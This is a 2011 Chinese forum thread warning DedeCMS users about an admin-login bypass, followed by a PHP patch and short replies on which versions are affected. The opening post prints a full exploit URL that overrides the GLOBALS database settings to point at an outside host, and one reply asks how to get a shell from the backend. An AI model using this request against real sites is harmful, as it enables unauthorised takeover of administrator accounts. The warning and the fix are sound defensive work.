用DEDECMS的注意了,赶紧修改后台地址

ReJeCt

http://www.xx.com/后台/login.php?dopost=login&validate=
dcug
&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

只要把验证码改为当前验证码,就能直接无密码进后台[ol]

解决办法：

找到include/common.inc.php文件，把

    foreach($_REQUEST as $_k=>$_v)

    {

        var_dump($_k);

        if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )

        {

            exit('Request var not allow!');

        }

    }

换成

    //检查和注册外部提交的变量

    function CheckRequest(&$val) {

        if (is_array($val)) {

            foreach ($val as $_k=>$_v) {

                CheckRequest($_k);

                CheckRequest($val[$_k]);

            }

        } else

        {

            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )

            {

                exit('Request var not allow!');

            }

        }

    }

    CheckRequest($_REQUEST);[/ol]复制代码

geyunbing

5.6貌似没这漏洞？

hitsword

原帖由 geyunbing 于 2011-8-11 09:52 发表


靠  又出bug

一跳而过

给力啊

nuet

dedecms后台怎么拿shell

貌似这个漏洞 5.7 5.6 都提示 你的密码错误。

[ 本帖最后由 xen 于 2011-8-11 10:20 编辑 ]

xen

原帖由 geyunbing 于 2011-8-11 09:52 发表


靠  又出bug

kwx

dedecms 未发现的bug应该还不少。

cpuer

还好一直没用dede

wyloveyx

试过了,好像这个洞不行哦谢谢提醒。DEDECMS的BUG可真多

monface见钱开眼

沒用過